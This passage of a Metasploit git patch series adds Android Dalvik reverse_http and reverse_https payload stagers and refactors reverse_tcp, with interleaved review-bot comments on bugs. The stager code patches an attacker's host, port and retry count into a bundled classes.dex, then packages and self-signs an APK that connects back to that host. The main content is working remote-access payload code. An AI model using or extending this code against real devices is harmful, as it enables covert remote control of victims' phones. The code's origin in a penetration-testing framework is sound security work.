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 diff --git a/data/android/metstage.jar b/data/android/metstage.jar index 095c7b9a64a328b35850cdffccaaae6fcd8dca33..1271994fbab34694c10605904afaff08038b88f0 100644 GIT binary patch delta 45 ucmdnZx0{bQz?+#xgn@&DgF$0j) From dc8992924fc192bdc02f8295a9bd5bebcc566856 Mon Sep 17 00:00:00 2001 
From: AnwarMohamed Date: Wed, 26 Feb 2014 02:18:42 +0200 Subject: [PATCH 050/853] android reverse_http/s --- .../payloads/stagers/android/reverse_http.rb | 88 +++++++++++++++++ .../payloads/stagers/android/reverse_https.rb | 94 +++++++++++++++++++ .../payloads/stagers/android/reverse_tcp.rb | 6 ++ 3 files changed, 188 insertions(+) create mode 100644 modules/payloads/stagers/android/reverse_http.rb create mode 100644 modules/payloads/stagers/android/reverse_https.rb diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb new file mode 100644 index 0000000000..182acd498d --- /dev/null +++ b/modules/payloads/stagers/android/reverse_http.rb 
@@ -0,0 +1,88 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_http' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Dalvik + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Dalvik Reverse HTTP Stager', + 'Description' => 'Tunnel communication over HTTP', + 'Author' => 'anwarelmakrahy', + 'License' => MSF_LICENSE, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'Handler' => Msf::Handler::ReverseHttp, + 'Stager' => {'Payload' => ""} + )) + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) + end + + def string_sub(data, placeholder, input) + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + + def generate_jar(opts={}) + jar = Rex::Zip::Jar.new + + classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) + + string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] + jar.add_file("classes.dex", fix_dex_header(classes)) + + files = [ + [ "AndroidManifest.xml" ], + [ "res", "drawable-mdpi", "icon.png" ], + [ "res", "layout", "main.xml" ], + [ "resources.arsc" ] + ] + + jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) + jar.build_manifest + + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 
1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + + jar.sign(key, cert, [cert]) + + jar + end + +end \ No newline at end of file diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb new file mode 100644 index 0000000000..cab35f9380 --- /dev/null +++ b/modules/payloads/stagers/android/reverse_https.rb 
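Review bot: `string_sub` pads with `' ' * (placeholder.length - input.length)`, and `String#*` raises ArgumentError on a negative count, so any LHOST, LPORT or RetryCount value longer than its placeholder aborts `generate_jar` with a "negative argument" error that says nothing about which option was too long. Nothing in this hunk checks the lengths first. I would add a guard as the first line of the helper: `raise ArgumentError, "#{input.inspect} does not fit the placeholder" if input.length > placeholder.length`. The same helper is copied into reverse_https.rb in this commit and is called with the new RetryCount value in reverse_tcp.rb, so the guard belongs in one shared definition.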
@@ -0,0 +1,94 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## +# + +require 'msf/core' +require 'msf/core/handler/reverse_https' + +module Metasploit3 + + include Msf::Payload::Stager + include Msf::Payload::Dalvik + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Dalvik Reverse HTTPS Stager', + 'Description' => 'Tunnel communication over HTTPS', + 'Author' => 'anwarelmakrahy', + 'License' => MSF_LICENSE, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'Handler' => Msf::Handler::ReverseHttps, + 'Stager' => {'Payload' => ""} + )) + + @class_files = [ + [ "metasploit", "PayloadTrustManager.class" ], + ] + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) + + end + + def string_sub(data, placeholder, input) + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + + def generate_jar(opts={}) + jar = Rex::Zip::Jar.new + + classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) + + string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST'] + string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] + jar.add_file("classes.dex", fix_dex_header(classes)) + + files = [ + [ "AndroidManifest.xml" ], + [ "res", "drawable-mdpi", "icon.png" ], + [ "res", "layout", "main.xml" ], + [ "resources.arsc" ] + ] + + jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) + jar.build_manifest + + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = 
OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + + jar.sign(key, cert, [cert]) + + jar + end + +end diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index d41922f40e..005380bad3 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -24,6 +24,11 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => {'Payload' => ""} )) + + register_options( + [ + OptInt.new('RetryCount', [true, "Number of trials to be made if connection failed", 10]) + ], self.class) end def string_sub(data, placeholder, input) @@ -37,6 +42,7 @@ module Metasploit3 string_sub(classes, '127.0.0.1 ', datastore['LHOST'].to_s) if datastore['LHOST'] string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) files = [ From 99cc94e6fc878f98e4932037aedc48842717d3ec Mon Sep 17 00:00:00 2001 
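Review bot: `@class_files` is assigned in `initialize` of reverse_https.rb but nothing in this file reads it; `generate_jar` builds the jar from classes.dex and the four entries in `files` only. If a mixin consumes the variable (not visible in this patch), say so in a comment above the assignment, for example `# read by <consumer> when the jar is assembled`; otherwise drop it. Apart from the URL scheme and the handler, the file is a copy of reverse_http.rb, so the shared body of `generate_jar` is worth moving into one helper.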
From: AnwarMohamed Date: Mon, 3 Mar 2014 06:54:56 +0200 Subject: [PATCH 051/853] moving string_sub() to payload/dalvik.rb --- lib/msf/core/payload/dalvik.rb | 4 ++++ modules/payloads/stagers/android/reverse_http.rb | 7 +++---- modules/payloads/stagers/android/reverse_https.rb | 7 +++---- modules/payloads/stagers/android/reverse_tcp.rb | 4 ---- 4 files changed, 10 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb index aeae5aa361..6c78e2802c 100644 --- a/lib/msf/core/payload/dalvik.rb +++ b/lib/msf/core/payload/dalvik.rb @@ -31,5 +31,9 @@ module Msf::Payload::Dalvik [str.length].pack("N") + str end + def string_sub(data, placeholder="", input="") + data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) + end + end diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index 182acd498d..b9de3d5242 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb @@ -31,11 +31,10 @@ module Metasploit3 ], self.class) end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) + u = datastore['LHOST'] ? datastore['LHOST'] : String.new + raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index cab35f9380..c2f81cf6bc 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb 
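Review bot: The moved `string_sub` in dalvik.rb gains the defaults `placeholder=""` and `input=""`, which no caller on this page uses, and an empty pattern passed to `gsub!` matches at every position of `data`. I would keep all three parameters required, `def string_sub(data, placeholder, input)`. It also needs a comment saying that the helper edits `data` in place and keeps its length by space-padding `input` to the placeholder's width. The enclosing module starts outside the hunk.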
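Review bot: The new check in reverse_http.rb measures the bare LHOST, but the value handed to `string_sub` is `"ZZZZhttp://" + datastore['LHOST'].to_s`, which is eleven characters longer, so a host that passes the limit of 32 can still be wider than the placeholder (its real width is not recoverable from this page). The message says bytes while `length` counts characters; `bytesize` is the matching call if the limit is a byte count. I would build the substituted string first and run the length check on that string. The same two lines are added to reverse_https.rb in the next hunk, where the prefix is `"ZZZZhttps://"`.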
@@ -37,11 +37,10 @@ module Metasploit3 end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) + u = datastore['LHOST'] ? datastore['LHOST'] : String.new + raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 005380bad3..53cb086783 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb @@ -31,10 +31,6 @@ module Metasploit3 ], self.class) end - def string_sub(data, placeholder, input) - data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) - end - def generate_jar(opts={}) jar = Rex::Zip::Jar.new From b45524ecddbcf37bb7e497bc18ee06b5452985a6 Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Tue, 4 Mar 2014 05:54:31 +0200 Subject: [PATCH 052/853] generate cert @ payload/dalvik.rb --- lib/msf/core/payload/dalvik.rb | 27 +++++++++++++++++ .../payloads/stagers/android/reverse_http.rb | 26 +---------------- .../payloads/stagers/android/reverse_https.rb | 29 +------------------ .../payloads/stagers/android/reverse_tcp.rb | 27 +---------------- 4 files changed, 30 insertions(+), 79 deletions(-) diff --git a/lib/msf/core/payload/dalvik.rb b/lib/msf/core/payload/dalvik.rb index 6c78e2802c..66c0345f2b 100644 --- a/lib/msf/core/payload/dalvik.rb +++ b/lib/msf/core/payload/dalvik.rb 
@@ -35,5 +35,32 @@ module Msf::Payload::Dalvik data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length)) end + def generate_cert + x509_name = OpenSSL::X509::Name.parse( + "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" + ) + key = OpenSSL::PKey::RSA.new(1024) + cert = OpenSSL::X509::Certificate.new + cert.version = 2 + cert.serial = 1 + cert.subject = x509_name + cert.issuer = x509_name + cert.public_key = key.public_key + + # Some time within the last 3 years + cert.not_before = Time.now - rand(3600*24*365*3) + + # From http://developer.android.com/tools/publishing/app-signing.html + # """ + # A validity period of more than 25 years is recommended. + # + # If you plan to publish your application(s) on Google Play, note + # that a validity period ending after 22 October 2033 is a + # requirement. You can not upload an application if it is signed + # with a key whose validity expires before that date. + # """ + cert.not_after = cert.not_before + 3600*24*365*20 # 20 years + return cert, key + end end diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index b9de3d5242..edfc65f548 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb 
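Review bot: `generate_cert` is not a behaviour-preserving extraction for reverse_tcp.rb: the block removed there set `cert.not_after = Time.at( 0x78045d81 + rand( 0x7fffffff - 0x78045d81 ))`, while the shared method uses `cert.not_before + 3600*24*365*20`. The comment quoted inside the method recommends more than 25 years, so the code and its own comment disagree as well. Keep one computation deliberately and make the comment match it, or state in the commit message that reverse_tcp changes. The method also needs a short doc comment saying that it returns `[cert, key]`, the reverse of the `jar.sign(key, cert, [cert])` argument order. The module's opening is outside this hunk.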
@@ -54,31 +54,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - cert.not_after = cert.not_before + 3600*24*365*20 # 20 years - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index c2f81cf6bc..6a50fa544b 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -25,9 +25,6 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} )) - - @class_files = [ - [ "metasploit", "PayloadTrustManager.class" ], ] register_options( 
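Review bot: The reverse_https.rb hunk on this line removes `@class_files = [` and its single entry but keeps the closing `]` as a context line, so `initialize` now has a bare `]` between `))` and `register_options(` and the file will not parse. The `]` line has to be deleted in the same change. `initialize` continues past the end of the hunk.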
@@ -60,31 +57,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - cert.not_after = cert.not_before + 3600*24*365*20 # 20 years - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar diff --git a/modules/payloads/stagers/android/reverse_tcp.rb b/modules/payloads/stagers/android/reverse_tcp.rb index 53cb086783..a6adcc1f77 100644 --- a/modules/payloads/stagers/android/reverse_tcp.rb +++ b/modules/payloads/stagers/android/reverse_tcp.rb 
@@ -51,32 +51,7 @@ module Metasploit3 jar.add_files(files, File.join(Msf::Config.data_directory, "android", "apk")) jar.build_manifest - x509_name = OpenSSL::X509::Name.parse( - "C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown" - ) - key = OpenSSL::PKey::RSA.new(1024) - cert = OpenSSL::X509::Certificate.new - cert.version = 2 - cert.serial = 1 - cert.subject = x509_name - cert.issuer = x509_name - cert.public_key = key.public_key - - # Some time within the last 3 years - cert.not_before = Time.now - rand(3600*24*365*3) - - # From http://developer.android.com/tools/publishing/app-signing.html - # """ - # A validity period of more than 25 years is recommended. - # - # If you plan to publish your application(s) on Google Play, note - # that a validity period ending after 22 October 2033 is a - # requirement. You can not upload an application if it is signed - # with a key whose validity expires before that date. - # """ - # The timestamp 0x78045d81 equates to 2033-10-22 00:00:01 UTC - cert.not_after = Time.at( 0x78045d81 + rand( 0x7fffffff - 0x78045d81 )) - + cert, key = generate_cert jar.sign(key, cert, [cert]) jar From ad8b0ef3d1a80c0437f16eb8194546f5da93cf2d Mon Sep 17 00:00:00 2001 From: AnwarMohamed Date: Thu, 6 Mar 2014 20:33:08 +0200 Subject: [PATCH 053/853] using http(s)://LHOST:LPORT --- modules/payloads/stagers/android/reverse_http.rb | 11 +++++------ modules/payloads/stagers/android/reverse_https.rb | 10 ++++------ 2 files changed, 9 insertions(+), 12 deletions(-) diff --git a/modules/payloads/stagers/android/reverse_http.rb b/modules/payloads/stagers/android/reverse_http.rb index edfc65f548..cafd8af906 100644 --- a/modules/payloads/stagers/android/reverse_http.rb +++ b/modules/payloads/stagers/android/reverse_http.rb 
@@ -32,15 +32,14 @@ module Metasploit3 end def generate_jar(opts={}) - u = datastore['LHOST'] ? datastore['LHOST'] : String.new - raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 - + host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new + port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s + raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32 + jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - - string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'ZZZZ ', "ZZZZhttp://" + host + ":" + port) string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) diff --git a/modules/payloads/stagers/android/reverse_https.rb b/modules/payloads/stagers/android/reverse_https.rb index 6a50fa544b..81a5b2a7a1 100644 --- a/modules/payloads/stagers/android/reverse_https.rb +++ b/modules/payloads/stagers/android/reverse_https.rb @@ -25,7 +25,6 @@ module Metasploit3 'Handler' => Msf::Handler::ReverseHttps, 'Stager' => {'Payload' => ""} )) - ] register_options( [ 
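Review bot: With `host` falling back to `String.new` and the substitution no longer guarded by `if datastore['LHOST']`, an unset LHOST now writes a URL with an empty host into classes.dex instead of leaving the placeholder untouched; `generate_jar` should raise when `host.empty?`. The error text still reads "LHOST can be 32 bytes long at the most" although the check now covers host, colon and port, and it still leaves out the `ZZZZhttp://` prefix that is substituted together with them. The fallback `8443.to_s` duplicates a default that presumably belongs to the handler's LPORT option. reverse_https.rb receives the same lines in this commit.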
@@ -35,15 +34,14 @@ module Metasploit3 end def generate_jar(opts={}) - u = datastore['LHOST'] ? datastore['LHOST'] : String.new - raise ArgumentError, "LHOST can be 32 bytes long at the most" if u.length > 32 + host = datastore['LHOST'] ? datastore['LHOST'].to_s : String.new + port = datastore['LPORT'] ? datastore['LPORT'].to_s : 8443.to_s + raise ArgumentError, "LHOST can be 32 bytes long at the most" if host.length + port.length + 1 > 32 jar = Rex::Zip::Jar.new classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'}) - - string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + datastore['LHOST'].to_s) if datastore['LHOST'] - string_sub(classes, '4444 ', datastore['LPORT'].to_s) if datastore['LPORT'] + string_sub(classes, 'ZZZZ ', "ZZZZhttps://" + host + ":" + port) string_sub(classes, 'TTTT ', "TTTT" + datastore['RetryCount'].to_s) if datastore['RetryCount'] jar.add_file("classes.dex", fix_dex_header(classes)) From 4f31eba7f47036503f9254b1b58d83f6575a1bac Mon Sep 17 00:00:00 2001 From: Tim Date: Wed, 19 Feb 2014 15:06:11 +0000 Subject: [PATCH 054/853] android payload golf --- data/android/apk/res/drawable-mdpi/icon.png | Bin 3079 -> 0 bytes data/android/apk/res/layout/main.xml | Bin 700 -> 0 bytes modules/payloads/stagers/android/reverse_tcp.rb | 2 -- 3 files changed, 2 deletions(-) delete mode 100644 data/android/apk/res/drawable-mdpi/icon.png delete mode 100644 data/android/apk/res/layout/main.xml 
